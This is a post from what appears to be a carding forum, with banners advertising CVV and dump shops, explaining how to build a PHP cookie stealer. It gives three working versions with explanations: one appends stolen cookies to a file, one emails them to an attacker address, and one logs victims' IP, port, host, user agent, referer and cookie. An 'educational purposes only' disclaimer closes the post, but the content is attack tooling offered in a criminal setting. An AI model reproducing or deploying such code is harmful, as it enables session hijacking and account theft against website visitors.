Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
adv ex on 5 january 2024
adv ex on 22 February 2024
banner Expire 26 October 2024
Rescator cvv and dump shop
banner expire at 13 May

Yale lodge shop
UniCvv
banner Expire 1 April 2021

How to create cookie stealer Coding in PHP?~ get via email

Premiums

Premiums

TRUSTED VENDOR
Joined
Dec 5, 2020
Messages
1,356
Here is the simple Cookie Stealer code:
Cookie stored in File:


<?php
$cookie = $HTTP_GET_VARS[“cookie”];
$steal = fopen(“cookiefile.txt”, “a”);
fwrite($steal, $cookie .”\n”);
fclose($steal);
?>
Click to expand...
$cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail

<?php
$cookie = $HTTP_GET_VARS[“cookie”]; mail(“[email protected]”, “Stolen Cookies”, $cookie);
?>
Click to expand...
The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”.


Third Version

<?php
function GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
$ip = $_SERVER[‘REMOTE_ADDR’];
else
$ip = “unknown”;
return($ip);
}
function logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER[‘QUERY_STRING’];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();
$rem_port = $_SERVER[‘REMOTE_PORT’];
$user_agent = $_SERVER[‘HTTP_USER_AGENT’];
$rqst_method = $_SERVER[‘METHOD’];
$rem_host = $_SERVER[‘REMOTE_HOST’];
$referer = $_SERVER[‘HTTP_REFERER’];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);
if (preg_match(“/bhtmb/i”, $ipLog) || preg_match(“/bhtmlb/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>”);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie nn”);
fclose($log);
}
logData();
?>
Click to expand...
The above Cookie stealer will store the following information:

  • Ip address
  • port number
  • host(usually computer-name)
  • user agent
  • cookie


This Article is for Educational purpose only, written for Ethical Hackers. This article is for creating public awareness about the Internet Risks.
 
You must log in or register to reply here.

Online statistics

Members online
2
Guests online
207
Total visitors
209
Totals may include hidden visitors.

Latest posts

Newest members

Stay Connected

Top Bottom